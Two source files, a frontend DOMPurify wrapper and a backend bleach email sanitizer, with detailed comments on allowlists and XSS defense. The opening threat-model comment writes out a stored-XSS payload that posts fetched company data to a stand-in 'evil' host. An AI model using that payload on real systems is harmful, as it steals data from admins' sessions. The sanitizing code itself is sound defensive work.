File: components/sanitize.js
// LTP HTML sanitizer — single source of truth for what HTML is allowed to
// reach the DOM. Wraps DOMPurify with an allowlist covering the tags the
// rich-text editor's toolbar produces plus the ones a real paste carries.
//
// Threat: stored XSS. A member-role user types or pastes malicious HTML
// (e.g. <img src=x onerror="fetch('/api/companies',{credentials:'include'})
// .then(r=>r.json()).then(d=>fetch('https://evil/x',{method:'POST',body:JSON
// .stringify(d)}))">). When an admin views the note, the script runs in the
// admin's session and exfiltrates everything.
//
// Defense in depth:
//   1. Sanitize when the editor saves changes (rich-text-editor.js onInput).
//   2. Sanitize when the editor re-loads existing content (init useEffect).
//   3. Sanitize at every render site that uses dangerouslySetInnerHTML.
//   4. Sanitize at every document.write site (print windows).
//   5. CSP headers from backend block any script that does sneak through.
//      This covers the print windows in (4) too: a document.write popup
//      inherits the opener's CSP (verified in Chromium — an external <img>
//      in such a popup is refused by img-src).
//
// All callers MUST use LTP_SANITIZE.html() — never call DOMPurify.sanitize
// directly. If we ever swap the library or tighten the allowlist, the
// change happens here once.
(function() {
  // ─── WHY THERE IS NO USE_PROFILES BELOW ─────────────────────────────────
  // Both configs used to pass USE_PROFILES: { html: true } alongside their
  // allowlists. DOMPurify does not intersect those — USE_PROFILES REPLACES
  // ALLOWED_TAGS and ALLOWED_ATTR with its built-in HTML profile, so the
  // allowlists below were decorative. Measured in Chromium against DOMPurify
  // 3.4.14, this config declared 13 tags and "no attributes" while actually
  // permitting 85 tags and 14 attributes, among them <form>/<input>/<button>
  // and style=/href=/src=/id=.
  //
  // Nothing executable got through even then (handlers and <script> are
  // dropped regardless, and the backend CSP blocks an injected form's POST via
  // form-action and an external tracking pixel via img-src — including inside
  // the print popup, which inherits the opener's CSP). What did get through
  // was enough for an in-app phishing overlay: a position:fixed <div> plus an
  // <a href> to anywhere, plantable by any member into a CRM note that an
  // admin later opens. Note bodies have no server-side sanitizer — email_html
  // covers templates, signatures and crew mail, not notes — so this pass is
  // the only allowlist on that path.
  //
  // If you add a config here, do NOT reintroduce USE_PROFILES to "also allow
  // the standard tags". Add the tags you want to the array instead.
  // ────────────────────────────────────────────────────────────────────────

  // Covers what the editor's execCommand buttons emit:
  //   bold/italic/underline/strikeThrough  → <b><i><u><s><strike>
  //   insertUnorderedList/insertOrderedList → <ul><ol><li>
  //   formatBlock H3 / BLOCKQUOTE          → <h3><blockquote>
  // plus the structural elements browsers wrap pasted text in (<p><div><br>),
  // and the tags a real paste actually carries: <strong>/<em>/<span> (what
  // Docs, Word and most web pages emit instead of <b>/<i>), the rest of the
  // h1–h4 range around the editor's own <h3>, and <a>.
  //
  // These paste tags are here because they were reachable in practice for as
  // long as USE_PROFILES was in place, so notes already contain them; dropping
  // them now would silently re-render existing notes as flattened text. The
  // h1–h4 ceiling mirrors EMAIL_ALLOWED_TAGS below rather than running to h6.
  //
  // href is the ONLY attribute allowed, because <a> is useless without it.
  // Everything else is stripped — in particular style= (the overlay vector
  // above), id= (DOM clobbering) and src= (the app's img-src would refuse the
  // request anyway, leaving a broken-image icon).
  var ALLOWED_TAGS = ["b", "i", "u", "s", "strike", "strong", "em", "span",
                      "p", "div", "br", "ul", "ol", "li",
                      "h1", "h2", "h3", "h4", "blockquote", "a"];
  var CONFIG = {
    ALLOWED_TAGS: ALLOWED_TAGS,
    ALLOWED_ATTR: ["href"],
    // Same protocol set as backend/sanitize.py's ALLOWED_PROTOCOLS
    // (http/https/mailto/tel). DOMPurify blocks javascript: on its own; this
    // also rules out data: and vbscript: hrefs.
    ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto|tel):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i,
    KEEP_CONTENT: true,          // strip tags but keep text inside
    ALLOW_DATA_ATTR: false,
  };

  function html(input) {
    if (input == null) return "";
    // DOMPurify is loaded as a global by index.html. If it failed to load
    // (network error, blocked by CSP, etc.), fall back to text-only: strip
    // ALL tags by treating the input as text content. Defensive — should
    // never happen in production where the script tag has SRI + is required.
    if (!window.DOMPurify) {
      console.error("[LTP] DOMPurify not loaded — falling back to text-only render");
      var tmp = document.createElement("div");
      tmp.textContent = String(input);
      return tmp.innerHTML;
    }
    return window.DOMPurify.sanitize(String(input), CONFIG);
  }

  // ─── Email allowlist ────────────────────────────────────────────────────
  // Separate, broader allowlist for email TEMPLATES and email BODIES — admins
  // paste templates from marketing tools (Mailchimp, Stripo) that rely on
  // tables for layout, inline styles for typography, and anchors for the
  // {{viewUrl}} button. This needs to MIRROR backend/sanitize.py's
  // ALLOWED_TAGS + ALLOWED_ATTRIBUTES exactly — otherwise the live preview
  // in the Send modal renders something different from what actually goes
  // out to the recipient, defeating the point of a preview.
  //
  // Used by:
  //   - Settings page email-template editor (preview pane)
  //   - Send modal body preview (commit 5)
  //   - Send modal signature template render
  //
  // NOT used by the rich-text editor — that stays on the narrow .html()
  // path because it only produces a tiny subset.
  var EMAIL_ALLOWED_TAGS = [
    "b", "i", "u", "strong", "em", "span", "br", "small", "sub", "sup",
    "p", "div", "h1", "h2", "h3", "h4", "blockquote", "hr",
    "ul", "ol", "li",
    "table", "thead", "tbody", "tfoot", "tr", "th", "td",
    "a", "img",
    // Section — used by EmailBodyEditor as the marker wrapper for the
    // auto-managed signature + header blocks. Mirror of backend/sanitize.py.
    "section",
  ];
  // DOMPurify takes ALLOWED_ATTR as a flat list (not per-tag); the resulting
  // permission is "this attr may appear on any tag in ALLOWED_TAGS." That's
  // looser than the backend's per-tag map but acceptable for a PREVIEW
  // surface — the backend remains authoritative at save and send time, so
  // any attribute drift gets normalized server-side.
  // `role` lets the customer-facing header table keep role="presentation"
  // (accessibility for table-layout emails).
  var EMAIL_ALLOWED_ATTR = [
    "class", "style", "title", "align", "role",
    "href", "target", "rel",
    "src", "alt", "width", "height",
    "colspan", "rowspan", "valign", "scope",
    "border", "cellpadding", "cellspacing",
  ];
  // No USE_PROFILES here either, and this one was actively wrong: the profile
  // does not include `target`, so it stripped target="_blank" from the preview
  // while backend/sanitize.py kept it — the preview/sent divergence the note
  // above says must not happen. It also let `bgcolor` and `id` through, which
  // the backend does not allow. Removing it makes EMAIL_ALLOWED_ATTR the real
  // list and the two sides line up.
  //
  // One divergence remains by design: bleach sanitizes the CONTENTS of style=
  // server-side (backend/sanitize.py's _ALLOWED_CSS_PROPERTIES notably omits
  // `position`), while DOMPurify passes CSS text through untouched. Templates
  // are scrubbed at save time by PUT /api/settings, so only unsaved keystrokes
  // in the preview can hold a property the backend would drop.
  var EMAIL_CONFIG = {
    ALLOWED_TAGS: EMAIL_ALLOWED_TAGS,
    ALLOWED_ATTR: EMAIL_ALLOWED_ATTR,
    ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto|tel):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i,
    KEEP_CONTENT: true,
    ALLOW_DATA_ATTR: false,
  };

  function emailHtml(input) {
    if (input == null) return "";
    if (!window.DOMPurify) {
      console.error("[LTP] DOMPurify not loaded — falling back to text-only render");
      var tmp = document.createElement("div");
      tmp.textContent = String(input);
      return tmp.innerHTML;
    }
    return window.DOMPurify.sanitize(String(input), EMAIL_CONFIG);
  }

  window.LTP_SANITIZE = {
    html: html,
    emailHtml: emailHtml,
    ALLOWED_TAGS: ALLOWED_TAGS.slice(),                  // diagnostics
    EMAIL_ALLOWED_TAGS: EMAIL_ALLOWED_TAGS.slice(),      // diagnostics
  };
})();

File: backend/sanitize.py
"""HTML allowlist sanitization for outbound email bodies.

Where this fits in the trust chain
==================================
Email templates are admin-authored. The Send modal also lets the sender
override the subject/body per send. Both surfaces can carry HTML now
(commit 2 of the email feature). That means three places where stored
HTML could XSS or otherwise misbehave if rendered without scrubbing:

  1. The Send modal preview in the LTP app, where another LTP user
     viewing a template could be attacked by a malicious admin who
     authored it. Mitigated by the frontend's LTP_SANITIZE.emailHtml
     wrapper (DOMPurify) on every preview render.

  2. The Gmail message sent to the client. Gmail itself sanitizes
     received HTML, but we should still ship clean content — anything
     Gmail strips silently degrades the email for the recipient, and
     "ship hostile HTML to a client's inbox" is bad in its own right.

  3. The PUT /api/settings payload that persists the template. We
     sanitize before storage so that anything outside the allowlist is
     dropped at write time, not just at render time.

This module is the SERVER-SIDE authoritative layer — runs at both
template-save (PUT /api/settings) and send-time (POST /api/email/send).
The frontend's DOMPurify is a defense-in-depth UX safeguard; the server
never trusts client-supplied HTML.

Allowlist rationale
===================
The tag/attribute list below matches what a real-world business email
(quote follow-up, invoice receipt) actually uses — typography (h1-h4,
strong, em), structure (p, div, br, hr, ul/ol/li, table), and the
viewUrl anchor. We deliberately do NOT allow <script>, <iframe>,
<object>, <embed>, <form>, or anything that pulls execution. The
`style` attribute is allowed because business-email templates pasted
from Mailchimp/Stripo rely heavily on inline CSS, but bleach's CSS
sanitizer (via `tinycss2`) strips dangerous declarations like
`expression()`, `javascript:` URLs, `position: fixed`, etc.

`data:` URLs are NOT allowed on `<img src>`. Embedded base64 images
bloat the message and are usually a sign of an export from a graphical
editor; recommend hosting on the company's own server and using `https:`
URLs instead. Easy to revisit if business need arises.
"""
import bleach
from bleach.css_sanitizer import CSSSanitizer


ALLOWED_TAGS = frozenset({
    # Inline typography
    "b", "i", "u", "strong", "em", "span", "br", "small", "sub", "sup",
    # Block typography
    "p", "div", "h1", "h2", "h3", "h4", "blockquote", "hr",
    # Lists
    "ul", "ol", "li",
    # Tables (commonly used by marketing-tool exports for layout)
    "table", "thead", "tbody", "tfoot", "tr", "th", "td",
    # Links + images
    "a", "img",
})


# `*` keys apply to every tag. Per-tag entries layer on top of `*`.
ALLOWED_ATTRIBUTES = {
    "*": ["class", "style", "title", "align"],
    "a": ["href", "target", "rel"],
    "img": ["src", "alt", "width", "height"],
    "td": ["colspan", "rowspan", "valign"],
    "th": ["colspan", "rowspan", "valign", "scope"],
    "table": ["width", "border", "cellpadding", "cellspacing"],
}


# Anchor protocols. `mailto:` is included so signatures can hyperlink the
# sender's email; `tel:` for phone numbers. No `javascript:`, `data:`, or
# `vbscript:` — those are the classic XSS vectors.
ALLOWED_PROTOCOLS = frozenset({"http", "https", "mailto", "tel"})


# CSS properties bleach will let through inside style="" attributes. Bleach's
# css_sanitizer strips everything not on this list AND strips any property
# value containing `expression(`, `url(javascript:...)`, or other classic
# CSS-based XSS vectors regardless of property name.
_ALLOWED_CSS_PROPERTIES = (
    # Box / layout (but NOT `position` — keeps emails from overlapping app UI)
    "margin", "margin-top", "margin-bottom", "margin-left", "margin-right",
    "padding", "padding-top", "padding-bottom", "padding-left", "padding-right",
    "width", "height", "max-width", "min-width", "max-height", "min-height",
    "display", "vertical-align", "text-align", "float", "clear",
    "border", "border-top", "border-bottom", "border-left", "border-right",
    "border-color", "border-width", "border-style", "border-collapse",
    "border-spacing", "border-radius",
    # Typography
    "color", "background", "background-color", "background-image",
    "font", "font-family", "font-size", "font-weight", "font-style",
    "line-height", "letter-spacing", "text-decoration", "text-transform",
    "white-space",
)


_css_sanitizer = CSSSanitizer(allowed_css_properties=_ALLOWED_CSS_PROPERTIES)


def email_html(html: str) -> str:
    """Sanitize HTML for outbound email or stored email templates.

    Returns clean HTML. Drops disallowed tags entirely (their text content
    is preserved), strips disallowed attributes, rejects anchors with
    unsafe protocols, and runs `style=""` values through CSS allowlist
    sanitization. Idempotent — running the output through this function
    again is a no-op.

    Empty / whitespace input is preserved as-is; callers decide whether to
    treat that as an error or as "skip the HTML alternative."
    """
    if not html:
        return html
    return bleach.clean(
        html,
        tags=ALLOWED_TAGS,
        attributes=ALLOWED_ATTRIBUTES,
        protocols=ALLOWED_PROTOCOLS,
        css_sanitizer=_css_sanitizer,
        strip=True,  # drop disallowed tags rather than HTML-escape them
    )
